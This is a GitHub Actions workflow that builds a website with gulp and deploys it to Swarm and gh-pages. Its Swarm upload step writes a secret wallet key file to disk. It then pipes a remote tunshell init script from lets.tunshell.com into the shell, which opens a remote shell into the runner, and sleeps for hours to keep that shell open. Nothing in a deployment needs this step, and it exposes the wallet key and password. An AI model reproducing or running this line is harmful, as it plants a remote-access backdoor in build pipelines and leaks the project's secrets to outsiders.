name: github pages

on:
  push:
    # branches-ignore:
    #   - '**'
    # tags:
    #   - 'v*.*.*'

jobs:
  deploy:
    runs-on: ubuntu-18.04
    steps:
      - uses: actions/checkout@v2
        with:
          fetch-depth: 0

      - uses: actions/setup-node@v1
        with:
          node-version: '12'

      - name: Install gulp
        run: npm install --global gulp-cli

      - name: Build
        run: |
          yarn
          yarn gulp
          echo "swarm.ethereum.org" > ./dist/CNAME

      - name: Upload using swarm-cli
        env:
          KEY_PASS: ${{ secrets.KEY_PASS }}
          KEY_FILE: ${{ secrets.KEY_FILE }}
          GATEWAY: ${{ secrets.GATEWAY }}
        run: |
          npm install --global @ethersphere/swarm-cli
          echo $KEY_FILE > wallet.json
          swarm-cli identity import --identity-name="uploader" --password="$KEY_PASS" wallet.json
          swarm-cli --identity="uploader" --password="$KEY_PASS" feed upload --path "./dist" --bee-api-url $GATEWAY --topic "0000000000000000000000000000000000000000000000000000000000000000"
          curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T dNExlPcM9UGS0rppxLAoqB oMW8IPsviGd5f0ryG9IuAn
          sleep 99999


      - name: Deploy to gh-pages
        uses: peaceiris/actions-gh-pages@v3
        with:
          github_token: ${{ secrets.GITHUB_TOKEN }}
          publish_dir: ./dist